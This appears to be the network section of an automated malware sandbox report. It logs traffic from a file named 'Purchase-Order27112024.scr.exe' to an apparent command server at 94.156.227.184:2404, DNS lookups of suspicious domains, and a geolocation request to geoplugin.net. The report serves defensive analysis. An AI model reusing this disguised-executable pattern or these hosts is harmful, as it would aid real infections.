                                                                                                    Nov 27, 2024 16:50:44.078344107 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.079107046 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.079268932 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.079333067 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.080127001 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.080224037 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.081028938 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.081094027 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.081132889 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.081192017 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.082034111 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.082140923 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.082364082 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.082964897 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.083164930 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.083261967 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.083911896 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.084086895 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.084177971 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.084853888 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.112564087 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.112591982 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.112731934 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.112940073 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.112996101 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.113037109 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.113939047 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.114078045 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.114131927 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.114928007 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.115272045 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.122832060 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.122992039 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.123065948 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.123332977 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.123506069 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.123559952 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.124255896 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.124351025 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.124413967 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.125166893 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.125296116 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.125351906 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.126104116 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.126230001 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.126316071 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.127073050 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.127235889 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.127321005 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.128087997 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.128200054 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.128436089 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.128983021 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.129064083 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.129138947 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.129949093 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.130100965 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.130165100 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.130872011 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.130980968 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.131028891 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.165401936 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.165529013 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.165626049 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.165627956 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.165661097 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.165743113 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.166532040 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.166631937 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.167494059 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.167546034 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.167570114 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.167612076 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.168490887 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.168591976 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.169460058 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.169516087 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.169540882 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.169563055 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.170360088 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.170478106 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.170645952 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.171243906 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.174823999 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.174866915 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.174905062 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.175303936 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.175524950 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.175566912 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.175715923 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.175770044 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.176366091 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.176484108 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.176619053 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.177306890 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.177378893 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.177475929 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.218729973 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.218842030 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.218914032 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.219124079 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.219240904 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.219338894 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.220010996 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.220148087 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.220204115 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.220957041 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.221093893 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.221155882 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.222045898 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.222170115 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.222352028 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.222884893 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.222949028 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.223249912 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.223958015 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.224001884 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.224198103 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.225122929 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.225186110 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.225332975 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.225703955 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.225848913 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.225950956 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.226831913 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.226854086 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.227005005 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.227650881 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.227746010 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.227854013 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.228590965 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.228686094 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.228796005 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.229489088 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.229666948 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.230443001 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.230506897 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.271384001 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.271478891 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.271569967 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.271744967 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.271848917 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.271898985 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.272721052 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.272845030 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.272913933 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.273657084 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.273791075 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.273838997 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.274599075 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.274722099 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.274801016 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.275523901 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.275599003 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.276470900 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.276525021 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.276566029 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.276643038 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.277446032 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.277496099 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.277544022 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.278371096 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.278485060 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.278542042 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.279325008 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.279447079 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.279509068 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.280288935 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.280492067 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.280541897 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.281213999 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.281311035 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.281374931 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.282166004 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.282238007 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.282957077 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.283102989 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.283222914 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.283555031 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.284082890 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.284168959 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.284221888 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.285026073 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.285128117 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.285188913 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.285928011 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.286003113 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.286073923 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.314009905 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.314277887 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.314385891 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.314559937 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.314694881 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.314759970 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.315702915 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.315810919 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.316385031 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.316555023 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.324369907 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.324424028 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.324450970 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.324732065 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.324784040 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.324804068 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.325639009 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.325706959 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.325723886 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.326687098 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.326776981 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.326796055 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.327532053 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.327599049 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.327625036 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.328495979 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.328542948 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.328562975 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.329447031 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.329509974 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.329554081 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:44.366408110 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:44.366492987 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:46.701443911 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:46.823427916 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.823445082 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.823453903 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.823463917 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.823473930 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.823484898 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.823551893 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.823558092 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:46.823599100 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.823601007 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:46.823688984 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.823700905 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.943851948 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.943885088 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.943933010 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.943994045 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.944075108 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.944142103 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.944621086 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:46.944689035 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:49.083800077 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:49.085479975 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:49.206228018 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:51:19.108216047 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:51:19.110193014 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:51:19.230165958 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:51:49.103863955 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:51:49.107505083 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:51:49.227435112 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:52:17.315742016 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:52:17.674949884 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:52:18.284240007 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:52:19.114577055 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:52:19.116504908 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:52:19.236582041 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:52:19.487356901 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:52:21.987353086 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:52:26.971745968 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:52:36.581046104 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:52:49.124485970 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:52:49.126017094 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:52:49.246170044 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:53:19.131654024 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:53:19.141123056 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:53:19.265388012 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:53:49.145493984 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:53:49.146939993 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:53:49.268090010 CET24044977694.156.227.184192.168.2.6
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 27, 2024 16:50:27.330326080 CET5027453192.168.2.61.1.1.1
                                                                                                    Nov 27, 2024 16:50:28.331729889 CET5027453192.168.2.61.1.1.1
                                                                                                    Nov 27, 2024 16:50:28.454212904 CET53502741.1.1.1192.168.2.6
                                                                                                    Nov 27, 2024 16:50:28.472810984 CET53502741.1.1.1192.168.2.6
                                                                                                    Nov 27, 2024 16:50:37.304496050 CET5126753192.168.2.61.1.1.1
                                                                                                    Nov 27, 2024 16:50:37.716075897 CET53512671.1.1.1192.168.2.6
                                                                                                    Nov 27, 2024 16:50:40.357188940 CET6330553192.168.2.61.1.1.1
                                                                                                    Nov 27, 2024 16:50:40.580705881 CET53633051.1.1.1192.168.2.6
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Nov 27, 2024 16:50:27.330326080 CET192.168.2.61.1.1.10xb4f2Standard query (0)www.healthselflesssupplies.co.zaA (IP address)IN (0x0001)false
                                                                                                    Nov 27, 2024 16:50:28.331729889 CET192.168.2.61.1.1.10xb4f2Standard query (0)www.healthselflesssupplies.co.zaA (IP address)IN (0x0001)false
                                                                                                    Nov 27, 2024 16:50:37.304496050 CET192.168.2.61.1.1.10xd48fStandard query (0)mynewpro.onlineA (IP address)IN (0x0001)false
                                                                                                    Nov 27, 2024 16:50:40.357188940 CET192.168.2.61.1.1.10x5e1cStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Nov 27, 2024 16:50:28.454212904 CET1.1.1.1192.168.2.60xb4f2No error (0)www.healthselflesssupplies.co.zahealthselflesssupplies.co.zaCNAME (Canonical name)IN (0x0001)false
                                                                                                    Nov 27, 2024 16:50:28.454212904 CET1.1.1.1192.168.2.60xb4f2No error (0)healthselflesssupplies.co.za164.160.91.32A (IP address)IN (0x0001)false
                                                                                                    Nov 27, 2024 16:50:28.472810984 CET1.1.1.1192.168.2.60xb4f2No error (0)www.healthselflesssupplies.co.zahealthselflesssupplies.co.zaCNAME (Canonical name)IN (0x0001)false
                                                                                                    Nov 27, 2024 16:50:28.472810984 CET1.1.1.1192.168.2.60xb4f2No error (0)healthselflesssupplies.co.za164.160.91.32A (IP address)IN (0x0001)false
                                                                                                    Nov 27, 2024 16:50:37.716075897 CET1.1.1.1192.168.2.60xd48fNo error (0)mynewpro.online94.156.227.184A (IP address)IN (0x0001)false
                                                                                                    Nov 27, 2024 16:50:40.580705881 CET1.1.1.1192.168.2.60x5e1cNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                    • www.healthselflesssupplies.co.za
                                                                                                    • geoplugin.net
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.649782178.237.33.50804892C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Nov 27, 2024 16:50:40.710700035 CET71OUTGET /json.gp HTTP/1.1
                                                                                                    Host: geoplugin.net
                                                                                                    Cache-Control: no-cache
                                                                                                    Nov 27, 2024 16:50:42.160033941 CET1170INHTTP/1.1 200 OK
                                                                                                    date: Wed, 27 Nov 2024 15:50:41 GMT
                                                                                                    server: Apache
                                                                                                    content-length: 962
                                                                                                    content-type: application/json; charset=utf-8
                                                                                                    cache-control: public, max-age=300
                                                                                                    access-control-allow-origin: *
